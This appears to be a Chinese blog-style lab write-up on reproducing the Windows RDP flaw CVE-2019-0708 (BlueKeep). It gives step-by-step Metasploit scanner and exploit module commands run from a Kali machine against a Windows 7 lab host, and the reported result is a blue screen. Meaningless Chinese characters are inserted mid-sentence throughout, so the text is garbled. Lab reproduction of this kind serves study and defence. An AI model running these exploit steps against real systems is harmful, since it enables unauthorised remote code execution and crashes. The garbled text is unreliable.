一.漏洞介紹
2019年5月15日,阿里云云盾應(yīng)急響應(yīng)中心監(jiān)測(cè)到微軟官方發(fā)布緊急安全補(bǔ)丁蜘醋,修復(fù)了一個(gè)Windows遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2019-0708),利用此漏洞可以直接獲取Windows服務(wù)器權(quán)限微饥。
該漏洞影響了某些舊版本的Windows系統(tǒng)颅眶,該漏洞為預(yù)身份驗(yàn)證都哭,無需用戶交互,當(dāng)未經(jīng)身份驗(yàn)證的攻擊者使用RDP(常見端口3389)連接到目標(biāo)系統(tǒng)并發(fā)送特質(zhì)請(qǐng)求時(shí)吁伺,可以在目標(biāo)系統(tǒng)上執(zhí)行任意命令智政,甚至傳播惡意蠕蟲,感染內(nèi)網(wǎng)其他機(jī)器箱蝠,獲取敏感信息,執(zhí)行遠(yuǎn)程代碼垦垂,發(fā)起DOS攻擊等宦搬,類似于2017年的WannaCry蠕蟲病毒
二.漏洞影響
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
三.復(fù)現(xiàn)過程
環(huán)境:kali(192.168.188.128)
win7(192.168.188.156)
1.進(jìn)入kali的msf中,查找0708
命令:search 0708
2.使用掃描模塊劫拗,并更改配置
命令:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
可以看到只需要更改ip即可(需要更改為win7的ip)
命令:set RHOSTS 192.168.188.156
可以看到间校,檢測(cè)出The Target is vulnerable,目標(biāo)很脆弱页慷,說明存在漏洞
接下來使用利用模塊
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
這里提示未配置payload憔足,因此上圖連同payload配置了
設(shè)置參數(shù)
命令:show options
set RHOSTS 192.168.188.156
運(yùn)行
沒有返回session,但是打開win7看到
被藍(lán)屏警告